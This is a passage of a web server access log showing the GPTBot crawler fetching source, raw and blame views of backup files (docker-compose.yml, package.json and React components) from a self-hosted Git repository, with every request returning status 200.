GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" +[17/Feb/2026:14:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" +[17/Feb/2026:14:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11152] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" +[17/Feb/2026:14:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11153] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" +[17/Feb/2026:14:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 11702] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13959] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14845] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +[17/Feb/2026:14:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +[17/Feb/2026:14:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +[17/Feb/2026:14:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +[17/Feb/2026:14:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +[17/Feb/2026:14:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 23742] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +[17/Feb/2026:14:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" +[17/Feb/2026:14:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" +[17/Feb/2026:14:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15579] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15580] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13813] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" +[17/Feb/2026:14:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14235] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" +[17/Feb/2026:14:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14234] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14847] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" +[17/Feb/2026:14:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 10980] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" +[17/Feb/2026:14:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16941] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10196] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" +[17/Feb/2026:14:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" +[17/Feb/2026:14:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13814] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" +[17/Feb/2026:14:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16940] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14990] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14690] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" +[17/Feb/2026:14:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14990] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14694] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15934] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14329] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14326] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15935] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 